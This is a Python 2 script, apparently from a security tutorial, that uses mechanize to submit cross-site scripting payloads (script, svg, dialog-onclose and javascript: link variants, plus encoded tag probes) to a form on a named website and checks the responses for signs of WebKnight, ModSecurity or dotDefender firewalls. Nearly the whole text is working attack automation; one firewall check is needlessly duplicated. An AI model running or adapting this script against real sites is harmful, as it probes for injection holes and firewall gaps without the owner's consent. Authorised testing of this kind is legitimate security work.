#wafdetectxssnofirewall

1. import mechanize as mec
2.  
3. maliciousRequest = mec.Browser()
4.  
5. formName = 'waf'
6.  
7. maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
8.  
9. maliciousRequest.select_form(formName)
10.  
11.  
12. crossSiteScriptingPayLoad = "<svg><script>alert&grave;1&grave;<p>"
13.  
14. maliciousRequest.form['data'] = crossSiteScriptingPayLoad
15.  
16.  
17.  
18. maliciousRequest.submit()
19. response =  maliciousRequest.response().read()
20.  
21. print response
22.  
23.  
24. if response.find('WebKnight') >= 0:
25.     print "Firewall detected: WebKnight"
26. elif response.find('Mod_Security') >= 0:
27.     print "Firewall detected: Mod Security"
28. elif response.find('Mod_Security') >= 0:
29.     print "Firewall detected: Mod Security"
30. elif response.find('dotDefender') >= 0:
31.     print "Firewall detected: Dot Defender"
32. else:
33.     print "No Firewall Present"
34.  
35.  
36.  
37. listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="
    javascript:alert(1)">CLICK ME<a>']
38.  
39. for payLoads in listofPayloads:
40.  
41.     maliciousRequest = mec.Browser()
42.  
43.     formName = 'waf'
44.  
45.     maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
46.  
47.     maliciousRequest.select_form(formName)
48.  
49.     maliciousRequest.form['data'] = payLoads
50.  
51.     maliciousRequest.submit()
52.  
53.     response = maliciousRequest.response().read()
54.  
55.     print "---------------------------------------------------"
56.  
57.     if response.find('WebKnight') >= 0:
58.         print "Firewall detected: WebKnight"
59.     elif response.find('Mod_Security') >= 0:
60.         print "Firewall detected: Mod Security"
61.     elif response.find('Mod_Security') >= 0:
62.         print "Firewall detected: Mod Security"
63.     elif response.find('dotDefender') >= 0:
64.         print "Firewall detected: Dot Defender"
65.     else:
66.         print "No Firewall Present"
67.  
68.     print "---------------------------------------------------"
69.  
70.  
71. listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e']
72.  
73. for payLoads in listofPayloads:
74.  
75.     maliciousRequest = mec.Browser()
76.  
77.     formName = 'waf'
78.  
79.     maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
80.  
81.     maliciousRequest.select_form(formName)
82.  
83.     maliciousRequest.form['data'] = payLoads
84.  
85.     maliciousRequest.submit()
86.  
87.     response = maliciousRequest.response().read()
88.  
89.     print "---------------------------------------------------"
90.  
91.     print response
92.  
93.     print "---------------------------------------------------"